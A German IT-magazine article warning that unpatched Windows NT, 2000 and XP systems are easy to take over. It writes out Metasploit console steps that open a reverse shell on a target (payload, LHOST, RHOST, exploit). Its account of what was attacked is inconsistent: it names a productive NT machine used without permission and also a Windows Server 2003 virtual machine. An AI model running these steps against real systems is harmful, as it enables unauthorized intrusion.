Die Gefahren alter Systeme
Nicht mit Windows ME oder 2000 ins Internet
Irrglauben: "Hacking ist kompliziert, da passiert schon nichts!"
Das "Hacking", das unerlaubte und möglichst unbemerkte Eindringen auf einen PC oder in eine Netzwerkstruktur, gilt gemeinhin als "hohe Kunst" in der IT. Hohes technisches Wissen, gepaart mit krimineller Energie, wird den Personen nachgesagt, die sich dem Hacking verschreiben haben.
Wir haben uns einmal selbst daran versucht, ein altes, aber noch produktives Windows NT-System, ohne die passende Erlaubnis und ohne das Wissen der Administrationsberechtigung, über das Netzwerk übernehmen zu wollen. Die Standard-Applikationen für derlei "Penetration Testings" sind Metasploit und Nexpose von Rapid7. Für das Herunterladen, das Aufsetzen der virtuellen Maschine mit Windows ServerServer 2003 Betriebssystem und den ersten Einblick der Software benötigten wir zirka vier Stunden. Alles zu Server auf CIO.de
Erschreckend einfach: Welche Sicherheitslücken die Software auf einem Zielrechner als "wahrscheinlich" einstuft, gibt Nexpose freizügig aus. In der Konsole von Metasploit mussten wir anschließend lediglich vier Eingaben vornehmen, ehe wir direkt in der Eingabeaufforderung des NT-Rechners landeten. Mit "set PAYLOAD generic/shell_reverse_tcp" wird die gewünschte "Sicherheitslücke" anvisiert, mit "set LHOST 10.117.21.123" definierten wir unsere Maschine als ausführenden Angreifer und mit "set RHOST 10.117.18.104" das Ziel. Das Kommando "exploit" führt den gewünschten Befehl aus und keine zehn Sekunden später konnten wir alle administrativen Befehle auf dem Zielrechner ausführen!
Das hätte genauso gut ein Windows 2000 oder XP-Computer mit fehlenden Patches sein können, wie das Internet-Video "Shell Root" auf YouTube eindrucksvoll zeigt. Uns geht es bei diesem Hinweis natürlich nicht darum, dem strafrechtlich relevanten "Hacking" Vorschub zu leisten; eher möchten wir Sie als Leser auf diese "reale Gefahr" hinweisen und zeigen, wie leicht es ist, ein solches System zu kompromittieren.